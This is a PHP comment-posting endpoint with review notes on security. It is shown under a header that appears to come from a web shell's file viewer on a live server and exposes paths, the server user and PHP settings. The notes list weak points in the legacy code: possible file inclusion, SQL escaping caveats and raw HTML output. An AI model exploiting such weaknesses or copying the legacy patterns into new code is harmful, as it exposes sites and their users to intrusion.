Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/junsu/


 

Current File : /home/queenjbs/junsu/comment_ajax.php
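<?php
// Comment AJAX endpoint: stores one comment for a board item, increments the
// item's reply counter, credits points to the author, and echoes the HTML
// fragment for the new comment.
//
// $contents, $num, $division, $sessionIDX and $db_con are not defined in this
// file; presumably they come from conf_dir.php and/or register_globals (TODO
// confirm). Everything except $db_con is treated as untrusted below.
//
// NOTE(review): the include path is built from $DOCUMENT_ROOT, which is not set
// in this file either. If a request parameter can populate it, this line is a
// file-inclusion risk; switch to $_SERVER['DOCUMENT_ROOT'] once confirmed
// equivalent.
include "$DOCUMENT_ROOT/conf/conf_dir.php";

// $division is interpolated as a table name, where string escaping gives no
// protection, so only a plain identifier is accepted.
// NOTE(review): tighten this to an explicit list of the board tables.
$division = isset($division) ? stripslashes($division) : '';
if (!preg_match('/\A[A-Za-z0-9_]+\z/', $division)) {
	exit;
}

// Incoming values presumably carry added slashes (magic_quotes_gpc or
// conf_dir.php, TODO confirm). They are stripped once here and each value is
// then escaped for the context it is used in.
$contents = isset($contents) ? stripslashes($contents) : '';
$num      = isset($num) ? stripslashes($num) : '';

// The comment is stored and echoed as an HTML fragment (line breaks become
// <br />), so the user's text is HTML-escaped before nl2br() is applied.
// No charset argument is passed: on this PHP version only the ASCII
// characters & < > " ' are rewritten, which leaves multibyte text intact.
// NOTE(review): confirm no reader of board_comment.content escapes it again.
$contents = nl2br(htmlspecialchars($contents, ENT_QUOTES));

$nick      = isset($_SESSION['S_NNAME']) ? $_SESSION['S_NNAME'] : '';
$nick_html = htmlspecialchars($nick, ENT_QUOTES);

if ($sessionIDX) {
	// NOTE(review): mysql_real_escape_string() is only reliable with multibyte
	// charsets when the connection charset was set via mysql_set_charset()
	// rather than "SET NAMES"; check conf_dir.php. The mysql_* extension has no
	// prepared statements; mysqli/PDO would be the longer-term fix.
	$num_sql      = mysql_real_escape_string($num, $db_con);
	$contents_sql = mysql_real_escape_string($contents, $db_con);
	$nick_sql     = mysql_real_escape_string($nick, $db_con);
	$session_sql  = mysql_real_escape_string($sessionIDX, $db_con);
	$ip_sql       = mysql_real_escape_string($_SERVER['REMOTE_ADDR'], $db_con);

	$file_query = "INSERT INTO board_comment (module_no,module_name,user_name,content,reg_date,user_no,ip) VALUES
                       ('$num_sql','$division','$nick_sql','$contents_sql',now(),'$session_sql','$ip_sql')";
	$result = mysql_query($file_query, $db_con);

	// Look up the id of the comment just inserted (newest row for this
	// item/user). get_db() is defined elsewhere; presumably it returns the
	// first column of the first row.
	$reply_num = get_db("SELECT idx FROM board_comment where module_no='$num_sql' and module_name='$division' and user_name='$nick_sql' order by idx desc");
	$reply_sql = mysql_real_escape_string($reply_num, $db_con);

	$update_query = "update $division set reply_count = reply_count+1 where no='$num_sql'";
	$results = mysql_query($update_query, $db_con);

	// Award points for the comment.
	$point = 20;
	$poi_action = "コメント";
	$point_no = get_db("SELECT poi_id FROM user_point where mem_id='$session_sql' and module_name='$division' and module_no='$num_sql' and reply_no='$reply_sql' and poi_action='$poi_action'");
	if ($point_no) {
		// A point row already exists for this comment: re-activate it.
		$point_no_sql = mysql_real_escape_string($point_no, $db_con);
		$point_query = "update user_point set poi_type = 'Y',poi_datetime=now() where poi_id='$point_no_sql'";
		$poi_result = mysql_query($point_query, $db_con);
	} else {
		// poi_content receives the same comment text, SQL-escaped like the
		// board_comment insert above.
		$contents_name = $contents;
		$point_query = "INSERT INTO `user_point` (`poi_id`, `module_no`,`reply_no`, `module_name`, `mem_id`, `poi_datetime`, `poi_content`, `poi_point`, `poi_type`, `poi_related_id`, `poi_action`) VALUES
			('', '$num_sql','$reply_sql', '$division', '$session_sql', now(), '$contents_sql', '$point', 'Y', '$session_sql', '$poi_action')";
		$poi_result = mysql_query($point_query, $db_con);
	}

	// $point is the constant set above, not request data.
	$point_user_query = "update user set m_point = m_point+$point where id='$session_sql'";
	$user_results = mysql_query($point_user_query, $db_con);
}

// NOTE(review): the fragment below is echoed even when $sessionIDX is empty,
// i.e. when nothing was stored. The nickname and comment text are
// HTML-escaped in both cases.
if ($division == "photo_gallery") {
	echo "<li class='vi_name'>$nick_html <span class='vi_txt'>$contents</span></li>";
} else {
	$today_tmp = date("Y.m.d");

	// The comment id ends up in an id attribute and inside a javascript: URL,
	// so only an integer (or nothing) is emitted.
	$reply_out = (isset($reply_num) && is_numeric($reply_num)) ? (int) $reply_num : '';

	// Avatar markup and colour for the commenter. get_imgColor() is defined
	// elsewhere; $replyImg is emitted as raw HTML and $replyColor inside a
	// style attribute, so both are assumed to be server-generated (confirm).
	$tmp_img = get_imgColor($sessionIDX);
	$replyImg = $tmp_img[0];
	$replyColor = $tmp_img[1];

	echo $COMMENT_LIST .="
       <div class='mv_date_tit'  id='vi".$reply_out."'>
         <div class='mvdate_tit_le nobody02' style='background-color:".$replyColor.";overflow: hidden; position: relative;'>$replyImg</div>
         <div class='mvdate_tit_ri'>$nick_html<span class='mvis_date'>$today_tmp</span><a href='javascript: commnet_del($reply_out)' style='margin:3px;'><img src='../images/sub/icon_del.jpg' alt='del' /></a><h2 class='font_nomal' style='word-break:break-all;'>$contents</h2></div>
        </div>
       ";
}

?>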
